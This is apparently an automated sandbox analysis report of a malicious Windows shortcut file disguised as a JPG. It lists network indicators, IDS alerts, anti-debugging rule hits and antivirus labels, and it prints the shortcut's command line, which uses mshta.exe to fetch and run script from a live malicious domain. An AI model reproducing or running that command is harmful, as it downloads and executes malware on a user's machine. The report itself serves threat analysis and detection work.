Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 5, 2021, 10:54 a.m. | Aug. 5, 2021, 10:57 a.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
bsnlplots.com | 172.67.221.235 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49165 -> 104.21.54.4:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49165 104.21.54.4:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | fd:49:9b:03:bf:ec:8d:81:dc:c1:61:c4:9e:5f:3d:c1:19:e9:29:1f |
request | GET https://bsnlplots.com/css/css/b/l/i2.php |
file | C:\Users\test22\AppData\Local\Temp\ADGMP-EC-AGB-June21.jpg.lnk |
cmdline | "C:\Windows\System32\mshta.exe" https://bsnlplots.com/css/css/b/l/i2.php |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
FireEye | Heur.BZC.YAX.Nioc.1.0593947D |
BitDefender | Heur.BZC.YAX.Nioc.1.0593947D |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.0593947D |
Ad-Aware | Heur.BZC.YAX.Nioc.1.0593947D |
Emsisoft | Heur.BZC.YAX.Nioc.1.0593947D (B) |
Sophos | Troj/DownLnk-X |
MAX | malware (ai score=87) |
Microsoft | Trojan:Script/Wacatac.B!ml |
GData | Heur.BZC.YAX.Nioc.1.0593947D |
ALYac | Heur.BZC.YAX.Nioc.1.0593947D |
Zoner | Probably Heur.LNKScript |
Qihoo-360 | ex_virus.lnk.lnkcmd.c |